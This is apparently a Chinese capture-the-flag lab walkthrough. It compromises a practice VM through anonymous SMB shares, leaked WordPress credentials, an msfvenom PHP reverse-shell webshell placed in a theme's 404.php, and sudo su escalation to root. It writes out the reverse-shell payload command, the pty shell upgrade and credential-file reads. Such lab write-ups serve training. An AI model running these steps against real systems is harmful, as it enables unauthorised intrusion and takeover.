SMB信息泄露

首先打开我们的kali攻击机和靶机  输入命令ifconfig查看攻击机ip

然后用nmap扫描出靶机的ip

nmap -sV 靶机ip扫描出靶机开启的端口服务

发现139/445开启的smb服务

针对smb协议，使用空口令
--  smbclient –L IP

针对SMB协议，使用空口令，若口令尝试登陆，并查看敏感文件，下载查看；
--  smbclient –L IP

然后需要密码登录 直接回车登录 发现靶机里边有三个文件 一个打印驱动 一个共享文件 一个空连接

一般共享文件里边会有我们要的信息

 smbclient ‘\\IP\share$'查看 发现里边有很多敏感文件

用get下载deets.txt  重新打开一个终端 ls查看目录 cat查看刚才下载的deets.txt文件

发现一个登陆密码

然后在共享文件夹里边还有一个配置文件 wordpress cd到这个文件下 用ls查看文件目录

发现一个php文件 一般会有泄露的用户名和密码 get一下下载来看 新打开一个终端 用gedit打开来看 果然发现了用户名和密码

然后发现靶机不能远程登录 我们就用dirb探测靶机

命令是：dirb http"/ip/  然后发现了一个可以登录的用户后台

我们右击用浏览器打开 发现是一个用户名登录的后台 用我们刚才在配置文件中下载的PHP中的那个用户名和密码登录发现可以登录 而且登录成功

接下来就是上传木马提权：1、制作webshell 2、启动监听获取返回的shell

1.输入命令 msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机IP地址 lport=4444 -f raw 制作webshell

然后把创建的webshell下载到桌面   把上边选中的代码部分复制到里边保存

然后回到终端输入命令  msfconsole   因为启动监听用的是msfonsole集成模块

然后就要上传webshell了，上传webshell有固定的上传点：上传到theme的404界面，然后访问404.php获得反弹的shell

上传方法：在后台管理界面appearence的editor可以找到404页面，把代码改成webshell里的，就是上边我们复制的那一长串代码

然后通过固定路径

http://靶场IP/wordpress/wp-content/themes/twentyfourteen/404.php访问webshell

（固定路径怎么来？twentyfourteen当前主机又要改成fifiteen，看404界面提示是什么就改成什么）

我的就是twentyfifteen

然后在终里反弹回了shell，我们就可以对靶机进行操作了，获得了普通权限。

 

接下来优化终端

（python -c "import pty;pty.spawn('/bin/bash')"）

使用cat /etc/passwd/查看当前系统的其他用户名

然后发现在 home目录下 有个togie用户，su togie去切换到togie目录，密码用之前发现的12345登录成功。

还是要去切换到root权限，用sudo -l查看su能执行哪些操作，然后用sudo su来提升权限

然后就切换到了root

一般在root的目录里有一个flag.txt 然后cat查看就能拿到flag了

两点：cat查看小文件 gedit查看大文件

nmap扫描靶机ip的时候 攻击机和靶机的网络连接模式要一样 不然扫不出来ip